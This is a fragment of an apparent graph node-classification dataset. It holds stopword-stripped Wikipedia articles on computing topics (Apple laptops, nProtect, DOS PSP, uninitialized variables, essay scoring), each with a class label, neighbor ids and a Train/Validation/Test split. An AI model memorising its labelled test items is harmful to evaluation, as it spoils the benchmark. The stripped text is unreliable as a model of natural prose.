      1316,
      3876,
      5413,
      3367,
      303,
      7983,
      305,
      9008,
      11056,
      8502,
      823,
      7479,
      11574,
      4410,
      10555,
      8510,
      1343,
      10560,
      6977,
      1347,
      1348,
      1349,
      10568,
      847,
      5455,
      9557,
      2903,
      2904,
      5463,
      10586,
      11102,
      9569,
      8549,
      4966,
      6502,
      11625,
      8554,
      7019,
      9579,
      4466,
      5492,
      3447,
      3960,
      8057,
      8059,
      11132,
      2432,
      6016,
      898,
      3462,
      4486,
      4998,
      8582,
      9606,
      8082,
      9107,
      406,
      1435,
      6558,
      7071,
      1952,
      8606,
      1954,
      10145,
      1956,
      421,
      7076,
      10654,
      9128,
      5546,
      8618,
      428,
      9643,
      5040,
      8627,
      5557,
      6074,
      7612,
      1469,
      9151,
      963,
      8644,
      4550,
      3529,
      8140,
      7629,
      11219,
      5588,
      2519,
      4057,
      4058,
      11227,
      4572,
      477,
      6109,
      4064,
      4578,
      4069,
      7147,
      5614,
      1010,
      499,
      9714,
      3573,
      7158,
      10739,
      7672,
      8188,
      2045,
      10238
    ],
    "mask": "Test"
  },
  {
    "node_id": 8525,
    "label": 3,
    "text": "PowerBook_170:powerbook 170 powerbook 170 released apple inc. 1991 along powerbook 100 powerbook 140 identical form factor 140 high end original powerbook line featuring faster 25 mhz motorola 68030 processor floating point unit fpu expensive significantly better quality active matrix display replaced powerbook 180 1992 though powerbook 100 direct descendant macintosh portable based internal architecture 170 portable direct successor no-compromise portable version desktop macintosh 170 includes virtually features incorporated original portable comparable desktop day smaller sleeker case design initiated suitable replacement portable features first generation 170 include reduced space external video port internal rom pds expansion slots indeed apple canceled external monitor adapter portable shortly announced instead relying numerous third party providers solutions still applicable 170 fcc regulations day prevented real use pds expansion slot restricting external connections powerbook 180 replacement would address external video less year later expansion slots would return macintosh portables three years later powerbook 500 series form pcmcia cards 170 also dropped external floppy disk port macintosh classic ii still one made provision second internal floppy disk port feature also missing rest desktop line time overall roughly equivalent features performance powerful macintosh iici desktop laptop 170 introduced system 7.0.1 specifically support new power management unique hardware features however due ram prices 1991 combined already high list price 170 like 100 140 2 megabytes mb ram soldered directly onto logicboard critics felt restrictive use system 7 since localized versions system 7 yet available worldwide japanese 6.0.7 kanjitalk version apple system software modified support three new powerbooks released version j-6.0.7.1 result version unofficially adapted use standard 6.0.7 allowing many users run system 6 powerbooks rather upgrading on-board ram expensive proprietary ram card 6 mb card us 899 170 shipped additional 2 mb ram card already installed less problem however 4 mb minimum recommended ram size use system 7 practical use ram disk battery power-saving feature though released time powerbook 140 powerbook 100 140 170 designed entirely apple 100 miniaturized sony full-sized macintosh portable result 170 represents first powerbook created apple 100 actually representing first design improvements though internal architecture oldest series",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      11066,
      9022,
      10562,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      6037,
      3483,
      2979,
      11171,
      8109,
      1461,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      10224,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 8526,
    "label": 4,
    "text": "INCA_Internet:inca internet inca internet corporation also known nprotect corporation sells computer software inca internet founded young heum joo current ceo president inca internet 2000 offers anti-virus anti-spyware game security unified corporate security headquartered seoul republic korea inca internet selected one deloitte technology fast 50 korea 2007 deloitte technology fast 500 asia pacific 2007 inca internet information security company based republic korea develops 'nprotect line computer security products young heum joo founded company january 31 2000 currently ceo president company currently holds 70 market share information security korean financial institutions 90 game portal security public company limited shares young hem joo largest stockholder followed jaic japan meespierson netherlands major investors include jaic japan largest independent venture capital firm kdb korea development bank main business areas inca internet include online pc security services financial institutions internet business corporations online game corporations among others online game security solutions united pc security solution corporate internal security b2c business online anti-virus normal internet users inca internet one first application service provider asp companies online pc security industry products widely used korean japanese financial institutions public institutions worldwide on-line game companies inca internet awarded ir52 jang yeong-sil award regarded highest reputable award korean industrial technology field acquired iso 9000 certificate tuvit certification institution affiliated german rwtuv group inca internet information security company korea included deloitte technology fast500 asia pacific 2007 inca internet currently client companies 23 countries total 200 million users 170 countries inca internet first entered market january 2000 acquired global patent 'nprotect netizen first program provide real-time client pc information security service inca internet developed strong corporation independent technology leading korean japanese security market financial electronic commerce industry inca internet first founded internet usage fast spread ill-intended cyber attack pattern diversification user niche various complicated malware started show limit single one-time purchase security solutions hw-based information security products since inca internet quickly adjusted information security market trend provided end-user based user friendly pc security solution optimized today internet environment since december 2005 inca internet located within guro digital complex largest industrial complex korea played pivotal role economic growth korea referred miracle han contributing 10 national exports 1970s futuristic industrial hub centering research development advanced information technology knowledge industries relocation great synergy effect inca internet many corporations located benefited information sharing partnerships inca internet nprotect products apply saas software service model first company security industry provide internet banking security online since spread saas model pc security web security company currently holds 70 market share information security korean financial institutions 90 game portal security internationally inca internet mainly provides security solutions china japan south-east asia europe companies jcb card ufj tokyo star bank among corporations using inca internet protection online game security system asp based pc security anti-virus solution unified solution web security programs widely used korean internet environment depend activex microsoft windows internet banks korea need programs law users using linux mac os x browsers operating systems besides internet explorer microsoft windows access online banks functions run kernel level os versions windows use uac user account control windows vista windows 7 higher unable run smoothly moreover program crash kernel x64 windows system input devices especially usb keyboard conjunction nprotect caused reason nprotect netizen nprotect personal nprotect keycrypt programs used mostly internet banking korea programmed terminate processes associated banking processes terminated indiscriminately deemed threat thus may compromise system stability programs also inject existing processes startup sometimes collide anti-viruses problematically korean banks update program every time inca releases update",
    "neighbors": [
      6303,
      7739,
      8998,
      1994,
      10026,
      6797,
      9293,
      7983,
      9791,
      823,
      10392,
      537,
      5754,
      7515,
      4956,
      5373,
      2558,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 8527,
    "label": 3,
    "text": "Interchangeable_parts:interchangeable parts interchangeable parts parts components practical purposes identical made specifications ensure nearly identical fit assembly type one part freely replace another without custom fitting filing interchangeability allows easy assembly new devices easier repair existing devices minimizing time skill required person assembly repair concept interchangeability crucial introduction assembly line beginning 20th century become important element modern manufacturing missing important industries interchangeability parts achieved combining number innovations improvements machining operations invention several machine tools slide rest lathe screw-cutting lathe turret lathe milling machine metal planer additional innovations included jigs guiding machine tools fixtures holding workpiece proper position blocks gauges check accuracy finished parts electrification allowed individual machine tools powered electric motors eliminating line shaft drives steam engines water power allowing higher speeds making modern large scale manufacturing possible modern machine tools often numerical control nc evolved cnc computerized numeric control microprocessors became available methods industrial production interchangeable parts united states first developed nineteenth century term american system manufacturing sometimes applied time distinction earlier methods within decades methods use various countries american system term historical reference rather current industrial nomenclature evidence use interchangeable parts traced back two thousand years carthage first punic war carthaginian ships standardized interchangeable parts even came assembly instructions akin tab slot b marked east asia warring states period later qin dynasty bronze crossbow triggers locking mechanisms mass-produced made interchangeable late 18th century french general jean-baptiste vaquette de gribeauval promoted standardized weapons became known système gribeauval issued royal order 1765 focus time artillery muskets handguns one accomplishments system solid cast cannons bored precise tolerances allowed walls thinner cannons poured hollow cores however cores often center wall thickness determined size bore standardized boring allowed cannons shorter without sacrificing accuracy range tighter fit shells also allowed standardization shells 18th century devices guns made one time gunsmiths unique manner one single component firearm needed replacement entire firearm either sent expert gunsmith custom repairs discarded replaced another firearm 18th early 19th centuries idea replacing methods system interchangeable manufacture gradually developed development took decades involved many people gribeauval provided patronage honoré blanc attempted implement système gribeauval musket level around 1778 honoré blanc began producing first firearms interchangeable flint locks although carefully made craftsmen blanc demonstrated front committee scientists muskets could fitted flint locks picked random pile parts muskets interchangeable locks caught attention thomas jefferson efforts honoré blanc jefferson ambassador france 1785 jefferson tried persuade blanc move america successful wrote american secretary war idea returned usa worked fund development president george washington approved idea 1798 contract issued eli whitney 12,000 muskets built new system louis de tousard fled french revolution joined u.s. corp artillerists 1795 wrote influential artillerist manual stressed importance standardization numerous inventors began try implement principle blanc described development machine tools manufacturing practices required would great expense u.s ordnance department years trying achieve interchangeability firearms produced cost manufacture 1853 evidence interchangeable parts perfected federal armories led savings ordnance department freely shared techniques used outside suppliers us eli whitney saw potential benefit developing interchangeable parts firearms united states military july 1801 built ten guns containing exact parts mechanisms disassembled united states congress placed parts mixed pile help reassembled firearms right front congress much like blanc done years congress captivated ordered standard united states equipment use interchangeable parts removed problems earlier eras concerning difficulty impossibility producing new parts old equipment one firearm part failed another could ordered firearm would discarded catch whitney guns costly handmade skilled workmen charles fitch credited whitney successfully executing firearms contract interchangeable parts using american system historians merritt roe smith robert b. gordon since determined whitney never actually achieved interchangeable parts manufacturing family arms company however death mass production using interchangeable parts first achieved 1803 marc isambard brunel cooperation henry maudslay simon goodrich management contributions brigadier-general sir samuel bentham inspector general naval works portsmouth block mills portsmouth dockyard hampshire england time napoleonic war height royal navy state expansion required 100,000 pulley blocks manufactured year bentham already achieved remarkable efficiency docks introducing power-driven machinery reorganising dockyard system marc brunel pioneering engineer maudslay founding father machine tool technology developed first industrially practical screw-cutting lathe 1800 standardized screw thread sizes first time collaborated plans manufacture block-making machinery proposal submitted admiralty agreed commission services 1805 dockyard fully updated revolutionary purpose-built machinery time products still built individually different components total 45 machines required perform 22 processes blocks could made three different sizes machines almost entirely made metal thus improving accuracy durability machines would make markings indentations blocks ensure alignment throughout process one many advantages new method increase labour productivity due less labour-intensive requirements managing machinery richard beamish assistant brunel son engineer isambard kingdom brunel wrote ten men aid machinery accomplish uniformity celerity ease formerly required uncertain labour one hundred ten 1808 annual production reached 130,000 blocks equipment still operation late mid-twentieth century eli terry using interchangeable parts using milling machine early 1800 ward francillon horologist concluded study terry already accomplished interchangeable parts early 1800 study examined several terry clocks produced 1800-1807 parts labeled interchanged needed study concluded clock pieces interchangeable first mass production using interchangeable parts america eli terry 1806 porter contract called production 4000 clocks three years contract terry crafted four-thousand wooden gear tall case movements time annual average dozen unlike eli whitney terry manufactured products without government funding terry saw potential clocks becoming household object use milling machine terry able mass-produce clock wheels plates dozen time jigs templates used make uniform pinions parts could assembled using assembly line crucial step toward interchangeability metal parts taken simeon north working miles eli terry north created one world first true milling machines metal shaping done hand file diana muir believes north milling machine online around 1816 muir merritt roe smith robert b. gordon agree 1832 simeon north john hall able mass-produce complex machines moving parts guns using system entailed use rough-forged parts milling machine milled parts near-correct size filed gage hand aid filing jigs historians differ question whether hall north made crucial improvement merrit roe smith believes done hall muir demonstrates close personal ties professional alliances simeon north neighboring mechanics mass-producing wooden clocks argue process manufacturing guns interchangeable parts probably devised north emulation successful methods used mass-producing clocks may possible resolve question absolute certainty unless documents unknown surface future skilled engineers machinists many armory experience spread interchangeable manufacturing techniques american industries including clockmakers sewing machine manufacturers wilcox gibbs wheeler wilson used interchangeable parts 1860 late adopt interchangeable system singer corporation sewing machine 1870s reaper manufacturer mccormick harvesting machine company 1870s–1880s several large steam engine manufacturers corliss mid-1880s well locomotive makers typewriters followed years later large scale production bicycles 1880s began use interchangeable system decades true interchangeability grew scarce difficult achievement everyday capability throughout manufacturing industries 1950s 1960s historians technology broadened world understanding history development people outside academic discipline knew much topic recently 1980s 1990s academic knowledge began finding wider audiences recently 1960s alfred p. sloan published famous memoir management treatise years general motors even longtime president chair largest manufacturing enterprise ever existed knew little history development say nowiki /nowiki henry m. leland believe one mainly responsible bringing technique interchangeable parts automobile manufacturing … called attention eli whitney long started development interchangeable parts connection manufacture guns fact suggests line descent whitney leland automobile industry one better-known books subject first published 1984 enjoyed readership beyond academia david a. hounshell american system mass production 1800–1932 development manufacturing technology united states principle interchangeable parts flourished developed throughout 19th century led mass production many industries based use templates jigs fixtures applied semi-skilled labor using machine tools augment later largely replace traditional hand tools throughout century much development work done creating gauges measuring tools calipers micrometers standards screw threads processes scientific management principle interchangeability remained constant introduction assembly line beginning 20th century interchangeable parts became ubiquitous elements manufacturing interchangeability relies parts dimensions falling within tolerance range common mode assembly design manufacture long part reaches assembly within tolerance mating parts totally random value reasons already discussed earlier another mode assembly called selective assembly gives randomness capability trade-off value two main areas application benefit economically selective assembly tolerance ranges tight quite held reliably making total randomness unavailable tolerance ranges reliably held fit finish final assembly maximized voluntarily giving randomness makes available ideally desirable either case principle selective assembly parts selected mating rather mated random parts inspected graded separate bins based end range fall violate falling within high low end range usually called heavy light violating high low end range usually called oversize undersize examples given french vierck provide one-paragraph description selective assembly aptly summarizes concept one might ask parts must selected mating makes selective assembly different oldest craft methods fact significant difference selective assembly merely grades parts several ranges within range still random interchangeability quite different older method fitting craftsman mated set parts specifically filed fit part specific unique counterpart contexts application requires extremely tight narrow tolerance ranges requirement may push slightly past limit ability machining processes stamping rolling bending etc stay within range cases selective assembly used compensate lack total interchangeability among parts thus pin must sliding fit hole free sloppy dimension may spec 'd 12.00 +0 −0.01 mm pin 12.00 +.01 −0 hole pins came oversize say pin 12.003mm diameter necessarily scrap mated counterparts also came oversize say hole 12.013mm true matching size parts size counterparts inherent example product application 12 mm dimension require extreme accuracy desired fit parts require good precision see article accuracy precision allows makers cheat little total interchangeability order get value manufacturing effort reducing rejection rate scrap rate sound engineering decision long application context support example machines intention future field service parts-replacing nature rather simple replacement whole unit makes good economic sense lowers unit cost products impede future service work example product might benefit approach could car transmission expectation field service person repair old transmission instead simply swap new one therefore total interchangeability absolutely required assemblies inside transmissions would specified anyway simply general principle except certain shaft required precision high cause great annoyance high scrap rates grinding area decent accuracy required long fit hole good every case money could saved saving many shafts scrap bin examples like one common real commerce conceivably could mostly separation concerns part complex system expected give performance make limiting assumptions parts system car transmission example separation concerns individual firms customers accept lack freedom options others supply chain example car buyer view car manufacturer within rights assume field-service mechanic ever repair old transmission instead replacing customer expects decision preserved make later repair shop based option less expensive time figuring replacing one shaft cheaper replacing whole transmission logic always valid reality might better customer total ownership cost pay lower initial price car especially transmission service covered standard warranty 10 years buyer intends replace car anyway pay higher initial price car preserve option total interchangeability every last nut bolt shaft throughout car going taken advantage anyway commerce generally chaotically multivariate logic prevail total interchangeability ends specified achieved even adds expense needless holistic view commercial system may avoided extent customers experience overall value minds detect appreciate without understand logical analysis thus buyers amazingly affordable car surprisingly low initial price probably never complain transmission field-serviceable long never pay transmission service lifespan ownership analysis important manufacturer understand even lost customer carve competitive advantage marketplace accurately predict cut corners ways customer never pay thus could give lower transmission unit cost however must sure transmissions using reliable replacement covered long warranty expense main area application selective assembly contexts total interchangeability fact achieved fit finish final products enhanced minimizing dimensional mismatch mating parts consider another application similar one 12 mm pin say example precision important produce desired fit accuracy also important 12 mm pin must interact something else accurately sized 12 mm implications example rejection rate lowered parts must fall within tolerance range scrapped savings salvaging oversize undersize parts scrap however still one bit value selective assembly mated pairs close identical sliding fit possible opposed tighter fits looser fits—all sliding varying resistance example product might benefit approach could toolroom-grade machine tool accuracy highly important also fit finish",
    "neighbors": [
      6777
    ],
    "mask": "None"
  },
  {
    "node_id": 8528,
    "label": 8,
    "text": "OutWit_Hub:outwit hub outwit hub web data extraction software application designed automatically extract information online local resources recognizes grabs links images documents contacts recurring vocabulary phrases rss feeds converts structured unstructured data formatted tables exported spreadsheets databases first version released 2010 version 8.0 released june 2019 program includes mozilla-based browser side bar gives access number views pre-set extractors web pages textual documents broken different constituents presented tables views application navigate series links sequences search engine results pages extract information elements organize tables export various formats predefined extractors allow collect structured tables lists feeds custom scrapers also created extract data less structured page elements regular expressions included scrapers well parts application define variable recognition markers although outwit hub presented tool non-technical users fact application n't use document object model structure extractions prevents visual point grab data scraping forces user wants create custom scrapers define markers source code page advantage approach however allows precise definition extraction masks html nodes faster execution document object model tree n't need rendered browser extraction time program exists two versions standalone application mozilla firefox add-on include identical features limited free version downloaded publisher site shareware enterprise edition application includes advanced extraction automation features specific large volume extractions sending series automatically generated http post queries uploading scraped data ftp servers",
    "neighbors": [
      7983,
      2901,
      6797,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 8529,
    "label": 2,
    "text": "Program_Segment_Prefix:program segment prefix program segment prefix psp data structure used dos systems store state program resembles zero page cp/m operating system psp following structure psp often used get command line arguments dos program example command foo.exe /a /f executes foo.exe arguments '/a '/f segment address psp passed ds register program executed also determined later using int 21h function 51h int 21h function 62h either function return psp address register bx alternatively .com programs loaded offset 100h one address psp directly using offsets listed offset 000h points beginning psp 0ffh points end etc example following code displays command line arguments dos 1.x necessary cs code segment register contain segment psp program termination thus standard programming practice involved saving ds register stack program start since ds register loaded psp segment terminating program retf instruction would pop saved segment value stack jump address 0 psp contained int 20h instruction executable .com file procedure unnecessary program could terminated merely direct int 20h instruction else calling int 21h function 0 however programmer still ensure cs register contained segment address psp program termination thus dos 2.x higher program termination accomplished instead int 21h function 4ch require cs register contain segment value psp",
    "neighbors": [
      7847,
      2729,
      8301,
      9166,
      2672,
      4409,
      8507,
      2942
    ],
    "mask": "None"
  },
  {
    "node_id": 8530,
    "label": 3,
    "text": "PowerPC_e300:powerpc e300 powerpc e300 family 32-bit powerpc microprocessor cores developed freescale primary use system-on-a-chip soc designs speed ranging 800 mhz thus making ideal embedded applications e300 superscalar risc core 16/16 32/32 kb l1 data/instruction caches four-stage pipeline load/store system register branch prediction integer unit optional double precision fpu e300 core completely backwards compatible g2 powerpc 603e cores derives e300 core cpu part several soc processors freescale",
    "neighbors": [
      6914,
      7299,
      3844,
      4868,
      1158,
      3846,
      4743,
      6663,
      5642,
      3467,
      1548,
      1933,
      7302,
      7305,
      3472,
      4881,
      2073,
      7065,
      1563,
      1309,
      6815,
      3493,
      6949,
      6311,
      8102,
      1321,
      8231,
      9391,
      10543,
      4017,
      5297,
      11314,
      1461,
      11447,
      8120,
      6715,
      9020,
      1725,
      1983,
      1985,
      10945,
      10180,
      3017,
      336,
      3540,
      342,
      9302,
      3932,
      11613,
      6878,
      3936,
      10501,
      1635,
      8931,
      869,
      7269,
      10214,
      10985,
      8048,
      3185,
      4465,
      4211,
      5235,
      10224,
      630,
      3319,
      7286,
      8058,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 8531,
    "label": 9,
    "text": "Uninitialized_variable:uninitialized variable computing uninitialized variable variable declared set definite known value used value predictable one programming error common source bugs software common assumption made novice programmers variables set known value zero declared true many languages true potential error languages c use stack space variables collection variables allocated subroutine known stack frame computer set aside appropriate amount space stack frame usually simply adjusting value stack pointer set memory new state typically efficiency concerns therefore whatever contents memory time appear initial values variables occupy addresses simple example c final value codice_1 undefined answer must 10 assumes started zero may may true note example variable codice_2 initialized zero first clause codice_3 statement another example dealing structs code snippet codice_4 contains variables describing information student function codice_5 leaks memory fails fully initialize members codice_6 take closer look beginning codice_7 codice_8 codice_9 initialized initialization codice_10 codice_11 members incorrect length codice_10 codice_11 character arrays less 16 bytes codice_14 fail fully initialize entire 16 bytes memory reserved members hence codice_15'ing resulted struct codice_16 leak stack memory caller case even variable implicitly initialised default value like 0 typically correct value initialised mean correct value default one however default initialisation 0 right practice pointers arrays pointers since makes invalid actually initialised correct value c variables static storage duration initialized explicitly initialized zero null pointers uninitialized variables frequent cause bugs kind bug particularly serious may reproducible instance variable may remain uninitialised branch program cases programs uninitialized variables may even pass software tests uninitialized variables powerful bugs since exploited leak arbitrary memory achieve arbitrary memory overwrite gain code execution depending case exploiting software utilizes address space layout randomization often required know base address software memory exploiting uninitialized variable way force software leak pointer address space used bypass aslr uninitialized variables particular problem languages assembly language c c++ designed systems programming development languages involved design philosophy conflicts performance safety generally resolved favor performance programmer given burden aware dangerous issues uninitialized variables languages variables often initialized known values created examples include even languages uninitialized variables allowed many compilers attempt identify uninitialized variables report compile-time errors",
    "neighbors": [
      1952,
      8289,
      8545,
      2627,
      1801,
      8554,
      779,
      9482,
      5165,
      5677,
      655,
      9871,
      11446,
      5176,
      10011,
      2045,
      5598,
      9432
    ],
    "mask": "None"
  },
  {
    "node_id": 8532,
    "label": 0,
    "text": "Symbolic_linguistic_representation:symbolic linguistic representation symbolic linguistic representation representation utterance uses symbols represent linguistic information utterance information phonetics phonology morphology syntax semantics symbolic linguistic representations different non-symbolic representations recordings use symbols represent linguistic information rather measurements typical kind symbolic linguistic representation phonetic transcription symbolic linguistic representations frequently used computational linguistics",
    "neighbors": [
      1890,
      3533
    ],
    "mask": "Train"
  },
  {
    "node_id": 8533,
    "label": 4,
    "text": "Security_event_manager:security event manager security event management sem related sim siem computer security disciplines use data inspection tools centralize storage interpretation logs events generated software running network acronyms sem sim siem sometimes used interchangeably generally refer different primary focus products practice many products area mix functions often overlap – many commercial vendors also promote terminology many systems applications run computer network generate events kept event logs logs essentially lists activities occurred records new events appended end logs occur protocols syslog snmp used transport events occur logging software host events generated better sems provide flexible array supported communication protocols allow broadest range event collection beneficial send events centralized sem system following reasons although centralised logging existed long time sems relatively new idea pioneered 1999 small company called e-security still evolving rapidly key feature security event management tool ability analyse collected logs highlight events behaviors interest example administrator super user logon outside normal business hours may include attaching contextual information host information value owner location etc identity information user info related accounts referenced event like first/last name workforce id manager name etc forth contextual information leveraged provide better correlation reporting capabilities often referred meta-data products may also integrate external remediation ticketing workflow tools assist process incident resolution better sems provide flexible extensible set integration capabilities ensure sem work customer environments sems often sold help satisfy u.s. regulatory requirements sarbanes-oxley pci-dss glba one major problems sem space difficulty consistently analyzing event data every vendor indeed many cases different products one vendor uses different proprietary event data format delivery method even cases standard used part chain like syslog standards n't typically contain enough guidance assist developers generate events administrators gather correctly reliably consumers analyze effectively attempt combat problem couple parallel standardization efforts underway first open group updating circa 1997 xdas standard never made past draft status new effort dubbed xdas v2 attempt formalize event format including data included events expressed xdas v2 standard include event delivery standards standards development dmtf may provide wrapper addition mitre also midst standardization effort called cee somewhat broader scope – attempts define event structure well delivery methods",
    "neighbors": [
      6273,
      10940,
      10213,
      8975,
      11611,
      700,
      3133
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8534,
    "label": 3,
    "text": "Macintosh_LC_II:macintosh lc ii macintosh lc ii personal computer designed manufactured sold apple computer inc. march 1992 march 1993 lc ii update original macintosh lc replacing motorola 68020 processor 68030 increasing onboard memory 4 mb lc ii priced 1,699 usd fully 800 less original lc introduced september 1992 apple introduced macintosh performa family consumer-oriented computers lc ii repackaged performa 400 lc ii replaced macintosh lc iii early 1993 lc ii discontinued north america two new performa models 405 430 introduced place october performa 400 405 430 discontinued new lc ii-based model called performa 410 introduced became apple new entry-level computer lc ii continued sold markets time lc ii apple highest-selling macintosh product 1992 lc ii retains original lc 16-bit system bus 10 mb ram limit making performance roughly earlier model main benefit 68030 processor lc ii onboard paged memory management unit system 7 uses enable new virtual memory feature apple opted get quick update lc door instead spending additional time required full architectural update happened following year macintosh lc iii lc ii sold time macintosh iisi 800 expensive lc ii 10 mb memory limit 16-bit data bus mono audio output iisi also includes nubus expansion slot lc ii lacks powered via button keyboard unlike lc range power switch back unit case lc ii retains predecessor pizza box form factor design updated lc ii production run auto-inject floppy drive substituted manual-inject unit revised front bezel longer featured horizontal indentation aligning floppy drive defining characteristic snow white design language logic board lc ii retains much original lc logic board design including 16-bit data path 10 mb memory limit limitations limited machine ability take full advantage 68030 cpu storage lc ii shipped one floppy drive standard options 40 80 mb hard drives original lc two internal floppy drive connectors lc ii one 5 lc units sold two floppy drives internal hard disks becoming common 1992 second connector removed video lc ii logic board one video ram slot filled 256 kb simm standard high-end configuration shipped 512 kb simm instead vram simms original lc supported lc ii upgrades apple sold 599 upgrade kit replaced lc ii logic board lc iii introduced march 23 1992 introduced september 4 1992 introduced april 12 1993 introduced october 18 1993",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      9312,
      8806,
      6258,
      10357,
      7286,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      11539,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      11171,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      9686,
      8665,
      10199,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 8535,
    "label": 2,
    "text": "Libipq:libipq libipq development library iptables userspace packet queuing libipq provides api communicating ip_queue libipq deprecated favour newer libnetfilter_queue linux kernel-2.6.14 onwards libipq used widely deployed applications interface linux kernel-space iptables packet filter",
    "neighbors": [
      9824,
      2804,
      3486
    ],
    "mask": "Test"
  },
  {
    "node_id": 8536,
    "label": 7,
    "text": "Comm100:comm100 comm100 comm100 network corporation provider customer service communication products products available saas software service company serves 200,000 businesses around globe company founded 3 july 2009 vancouver british columbia canada first product comm100 live chat introduced 5 august 2009 company reached 100,000 registered business users milestone april 2011 company products services offered free christmas 2011 may 2013 company joined m3aawg supporter 2013 comm100 silver winner best biz awards international year company provides suite business communication tools customer service marketing two popular products comm100 live chat live support software allows users track chat website visitors real time comm100 email marketing bulk email software helps users send opt-in email newsletters subscribers products developed microsoft technologies asp.net microsoft sql server iis internet information services etc",
    "neighbors": [
      3634,
      11030,
      4439
    ],
    "mask": "Test"
  },
  {
    "node_id": 8537,
    "label": 4,
    "text": "Four_Horsemen_of_the_Infocalypse:four horsemen infocalypse four horsemen infocalypse term internet criminals imagery internet criminals play four horsemen apocalypse refers types criminals use internet facilitate crime consequently jeopardize rights honest internet users appear exact definition horsemen usually described terrorists drug dealers pedophiles organized crime sources use slightly different descriptions generally refer types criminals term coined timothy c. may 1988 referred child pornographers terrorists drug dealers etc discussing reasons limited civilian use cryptography tools among famous cypherpunk faq states term seems used less often discussions online criminal activity often discussions negative chilling effects activity regular users daily experiences online also used frequently describe political tactic think children message mailing list states four supposed threats may used individually depending circumstances aj 2013 director safe internet league voluntary censorship group russia claimed pedophiles perverts drug dealers “ creeps ” using tor anonymity software reason software outlawed list mention terrorists money-launderers directly use catch-all phrase creeps potentially includes 2015 uk conservative party claimed proposed “ new communications data legislation strengthen ability disrupt terrorist plots criminal networks organised child grooming gangs ” echoing child pornographers terrorists drug dealers etc quote timothy c. may later 2015 gamma group released statement claiming surveillance technology used terrorist threats drug cartels major organised crime paedophile rings justification concerns used target opposition politicians media groups uganda money-laundering treated major organised crime quote matches closely list given cypherpunk faq",
    "neighbors": [
      3192
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8538,
    "label": 0,
    "text": "Automated_essay_scoring:automated essay scoring automated essay scoring aes use specialized computer programs assign grades essays written educational setting method educational assessment application natural language processing objective classify large set textual entities small number discrete categories corresponding possible grades—for example numbers 1 6 therefore considered problem statistical classification several factors contributed growing interest aes among cost accountability standards technology rising education costs led pressure hold educational system accountable results imposing standards advance information technology promises measure educational achievement reduced cost use aes high-stakes testing education generated significant backlash opponents pointing research computers yet grade writing accurately arguing use purposes promotes teaching writing reductive ways i.e teaching test historical summaries aes trace origins field work ellis batten page 1966 argued possibility scoring essays computer 1968 published successful work program called project essay grade™ peg™ using technology time computerized essay scoring would cost-effective page abated efforts two decades eventually page sold peg measurement incorporated 1990 desktop computers become powerful widespread aes practical possibility early 1982 unix program called writer workbench able offer punctuation spelling grammar advice collaboration several companies notably educational testing service page updated peg ran successful trials early 1990s peter foltz thomas landauer developed system using scoring engine called intelligent essay assessor™ iea iea first used score essays 1997 undergraduate courses product pearson educational technologies used scoring within number commercial products state national exams intellimetric® vantage learning aes engine development began 1996 first used commercially score essays 1998 educational testing service offers e-rater® automated essay scoring program first used commercially february 1999 jill burstein team leader development ets criterion online writing evaluation service uses e-rater engine provide scores targeted feedback lawrence rudner done work bayesian scoring developed system called betsy bayesian essay test scoring system results published print online commercial system incorporates betsy yet leadership howard mitzel sue lottridge pacific metrics developed constructed response automated scoring engine crase® currently utilized several state departments education u.s. department education-funded enhanced assessment grant pacific metrics ’ technology used large-scale formative summative assessment environments since 2007 measurement inc. acquired rights peg 2002 continued develop 2012 hewlett foundation sponsored competition kaggle called automated student assessment prize asap 201 challenge participants attempted predict using aes scores human raters would give thousands essays written eight different prompts intent demonstrate aes reliable human raters competition also hosted separate demonstration among 9 aes vendors subset asap data although investigators reported automated essay scoring reliable human scoring claim substantiated statistical tests vendors required tests performed precondition participation moreover claim hewlett study demonstrated aes reliable human raters since strongly contested including randy e. bennett norman o. frederiksen chair assessment innovation educational testing service major criticisms study five eight datasets consisted paragraphs rather essays four eight data sets graded human readers content rather writing ability rather measuring human readers aes machines true score average two readers scores study employed artificial construct resolved score four datasets consisted higher two human scores disagreement last practice particular gave machines unfair advantage allowing round datasets beginning basic procedure aes start training set essays carefully hand-scored program evaluates surface features text essay total number words number subordinate clauses ratio uppercase lowercase letters—quantities measured without human insight constructs mathematical model relates quantities scores essays received model applied calculate scores new essays recently one mathematical model created isaac persing vincent ng evaluates essays features also argument strength evaluates various features essay agreement level author reasons adherence prompt topic locations argument components major claim claim premise errors arguments cohesion arguments among various features contrast models mentioned model closer duplicating human insight grading essays various aes programs differ specific surface features measure many essays required training set significantly mathematical modeling technique early attempts used linear regression modern systems may 